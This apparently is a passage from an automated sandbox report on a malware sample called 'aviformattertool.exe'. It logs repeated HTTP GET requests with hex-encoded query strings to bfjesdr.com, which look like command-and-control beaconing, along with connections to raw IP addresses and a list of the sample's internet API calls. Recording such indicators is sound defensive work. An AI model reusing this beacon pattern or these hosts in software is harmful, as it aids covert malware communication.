                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: unknownTCP traffic detected without corresponding DNS query: 65.109.80.185
                Source: unknownTCP traffic detected without corresponding DNS query: 65.109.80.185
                Source: unknownTCP traffic detected without corresponding DNS query: 65.109.80.185
                Source: unknownTCP traffic detected without corresponding DNS query: 65.109.80.185
                Source: unknownTCP traffic detected without corresponding DNS query: 65.109.80.185
                Source: unknownTCP traffic detected without corresponding DNS query: 65.109.80.185
                Source: unknownTCP traffic detected without corresponding DNS query: 65.109.80.185
                Source: unknownTCP traffic detected without corresponding DNS query: 65.109.80.185
                Source: unknownTCP traffic detected without corresponding DNS query: 65.109.80.185
                Source: unknownTCP traffic detected without corresponding DNS query: 65.109.80.185
                Source: unknownTCP traffic detected without corresponding DNS query: 65.109.80.185
                Source: unknownTCP traffic detected without corresponding DNS query: 65.109.80.185
                Source: unknownUDP traffic detected without corresponding DNS query: 141.98.234.31
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: 3_2_02A172FC Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_strtok,_swscanf,_strtok,_free,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_free,3_2_02A172FC
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608efa10c2ec9c9d3c HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
